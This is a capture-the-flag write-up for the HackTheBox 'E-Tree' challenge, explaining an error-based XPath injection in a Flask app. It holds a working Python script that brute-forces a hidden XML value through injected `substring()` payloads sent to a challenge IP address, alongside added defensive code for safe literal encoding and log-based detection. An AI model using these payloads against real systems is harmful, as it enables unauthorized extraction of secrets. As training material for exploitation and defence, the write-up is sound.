HackTheBox Cyber Apocalypse CTF 2021: E-Tree
TL;DR
- The application is a Python Flask backend parsing XML with XPATH.
- User input is embedded directly into an XPATH query.
- Some users contain a hidden `selfDestructCode` XML node.
- Error-based XPATH injection is used to brute-force the value.
- `substring()` extracts one character at a time.
- Presence of the string `exists` confirms a correct guess.
- Iterating until `}` reveals the full flag.
Video Walkthrough
Challenge Description
E.Tree was a Python Flask application that used XPATH to parse XML files. We were presented with an example XML file in which we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to do an error-based XPATH injection to determine the flag one character at a time.
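The root cause is that the search value lands inside a quoted XPath string literal, so a quote in the input ends the literal and the rest is parsed as query syntax. The following is an added example, not the challenge's source: it builds the lookup the vulnerable way and the safe way, and includes a small structural check that shows the difference. The `name` element and the predicate template are assumptions (the challenge's XML only shows the `selfDestructCode` path); the payload string reuses the shape from the walkthrough with a fixed position and guess character.

```python
# Added example (not the challenge's own code): building an XPath predicate
# from user input the unsafe way, the safe way, and a structural check that
# shows the difference. The <name> element and the predicate template are
# assumptions; the challenge's XML only shows the selfDestructCode path.
import re
from typing import List

# Assumed lookup run by the /api/search endpoint.
QUERY_TEMPLATE = "/military/district/staff[name={literal}]"

# Shape of the walkthrough's payload with a fixed position and guess
# character; used here only as input to the two builders below.
INJECTION_INPUT = (
    "' or substring((/military/district[position()=3]"
    "/staff[position()=2]/selfDestructCode),1,1)=\"C\" or ''=' "
)


def build_query_unsafe(search: str) -> str:
    """Mirrors the flaw: raw input is dropped between two quote characters."""
    return QUERY_TEMPLATE.format(literal="'" + search + "'")


def xpath_string_literal(value: str) -> str:
    """Encode any Python string as an XPath 1.0 string literal.

    XPath 1.0 has no escape sequence for a quote inside a literal. A value
    holding only one kind of quote is wrapped in the other kind; a value
    holding both is split on the single quote and reassembled with concat(),
    so every fragment is a literal that cannot terminate itself.
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    fragments: List[str] = []
    parts = value.split("'")
    for index, part in enumerate(parts):
        fragments.append("'" + part + "'")  # part contains no single quote
        if index < len(parts) - 1:
            fragments.append("\"'\"")        # the single quote itself
    return "concat(" + ", ".join(fragments) + ")"


def build_query_safe(search: str) -> str:
    """Same lookup, but the input can only ever be a string literal."""
    return QUERY_TEMPLATE.format(literal=xpath_string_literal(search))


def text_outside_literals(query: str) -> str:
    """Return the parts of an XPath expression that are not inside quotes."""
    outside: List[str] = []
    quote = None
    for char in query:
        if quote is None:
            if char in ("'", '"'):
                quote = char
            else:
                outside.append(char)
        elif char == quote:
            quote = None
    return "".join(outside)


def boolean_operators(query: str) -> List[str]:
    """List every 'or' / 'and' operator that sits outside string literals.

    A predicate built from one user-supplied literal should contain none;
    any that appear came from the input changing the query's structure.
    """
    return re.findall(r"\b(or|and)\b", text_outside_literals(query))


if __name__ == "__main__":
    for label, builder in (("unsafe", build_query_unsafe), ("safe", build_query_safe)):
        query = builder(INJECTION_INPUT)
        print(f"{label}: {query}")
        print(f"  operators outside literals: {boolean_operators(query)}")
```

For ordinary input both builders produce the same query; for the injection input the unsafe query gains two `or` operators outside any literal, while the safe query keeps the whole value inside `concat(...)` literals. Where the XPath library offers bound variables (for example lxml's `xpath("...[name=$n]", n=value)`), prefer those over building the literal by hand.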
Solution
```python
import requests
import string
from time import sleep

flag_pt1 = "CHTB{Th3_3xTr4_l3v3l_"
flag = "4Cc3s$_c0nTr0l}"
url = "http://139.59.168.47:30661/api/search"

# Each time a successful login is seen, restart loop
restart = True
count = len(flag) + 1
while restart:
    restart = False
    for char in "_" + string.ascii_letters + string.digits + "!#$%^()@{}£&*-=+.,~:;[]":
        # Update position index for the 2 separate flag parts
        post_data = {"search": "' or substring((/military/district[position()=3]/staff[position()=2]/selfDestructCode)," + str(count) + ",1)=\"" + char + "\" or ''=' "}
        print(post_data)
        try:
            r = requests.post(url, json=post_data, headers={'Content-Type': 'application/json'})
        except BaseException:
            # Request failed: skip this guess rather than reading an unset r
            continue
        # Correct char results in "successful password"
        if 'exists' in r.text:
            restart = True
            count += 1
            flag += char
            print(flag)
            # Exit if "}" gives a valid redirect
            if char == "}":
                print("\nFlag: " + flag)
                exit(0)
            break
        sleep(1)
```
Flag: CHTB{Th3_3xTr4_l3v3l_4Cc3s$_c0nTr0l}
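From the defending side, this brute force is loud: every guess is a separate `/api/search` request whose search value contains an XPath function call, boolean operators next to quote characters, and the `''='` tail, and one source sends dozens of them in a row. The following is an added example, not part of the original walkthrough, that applies those three signals to request logs and reports sources exceeding a small threshold. The JSON log format and the sample records are constructed for the example.

```python
# Added example (not part of the original walkthrough): spotting an
# error-based XPath brute force in request logs. The log format below is
# constructed for this example; the rules come from what the attack needs:
# an XPath function call, a boolean operator beside a quote, or a
# quote-to-quote comparison inside the search value, repeated many times
# from one source.
import json
import re
from collections import Counter
from typing import Dict, List

XPATH_FUNCTION = re.compile(
    r"\b(substring|string-length|count|concat|contains|starts-with|position)\s*\(",
    re.IGNORECASE,
)
BOOLEAN_OPERATOR = re.compile(r"\b(or|and)\b", re.IGNORECASE)
QUOTE_COMPARISON = re.compile(r"['\"]\s*=\s*['\"]")


def is_suspicious(search: str) -> bool:
    """True when a search value looks like XPath syntax rather than a name."""
    has_quote = "'" in search or '"' in search
    if XPATH_FUNCTION.search(search):
        return True
    if QUOTE_COMPARISON.search(search):
        return True
    # A bare "or"/"and" is only a signal next to a quote, so names such as
    # "O'Brien" or "Anderson" are not flagged.
    return has_quote and BOOLEAN_OPERATOR.search(search) is not None


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed JSON log record: {"ip", "path", "body"}."""
    record = json.loads(line)
    body = json.loads(record.get("body") or "{}")
    return {
        "ip": record["ip"],
        "path": record["path"],
        "search": str(body.get("search", "")),
    }


def suspicious_requests_by_ip(lines: List[str]) -> Dict[str, int]:
    """Count suspicious /api/search requests per source address."""
    counts: Counter = Counter()
    for line in lines:
        record = parse_line(line)
        if record["path"] == "/api/search" and is_suspicious(record["search"]):
            counts[record["ip"]] += 1
    return dict(counts)


def brute_force_sources(lines: List[str], threshold: int = 3) -> List[str]:
    """Sources with at least `threshold` suspicious requests. One request per
    guessed character means a real run produces far more than three."""
    return sorted(ip for ip, n in suspicious_requests_by_ip(lines).items() if n >= threshold)


def _guess(position: int, char: str) -> str:
    """Constructed payload in the walkthrough's shape, for the sample log only."""
    return (
        "' or substring((/military/district[position()=3]/staff[position()=2]"
        f"/selfDestructCode),{position},1)=\"{char}\" or ''=' "
    )


def _record(ip: str, search: str) -> str:
    return json.dumps({"ip": ip, "path": "/api/search", "body": json.dumps({"search": search})})


# Constructed sample: three guesses from one address, two ordinary lookups.
SAMPLE_LOG = [
    _record("203.0.113.5", _guess(1, "A")),
    _record("203.0.113.5", _guess(1, "B")),
    _record("203.0.113.5", _guess(1, "C")),
    _record("198.51.100.7", "Smith"),
    _record("198.51.100.7", "O'Brien"),
]

if __name__ == "__main__":
    print(suspicious_requests_by_ip(SAMPLE_LOG))
    print("brute-force sources:", brute_force_sources(SAMPLE_LOG))
```

The per-character loop in the solution above would also show up as a steady one-request-per-second cadence with the search value differing in a single character, which is a second, rate-based signal worth alerting on even where the content rules miss a variant.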
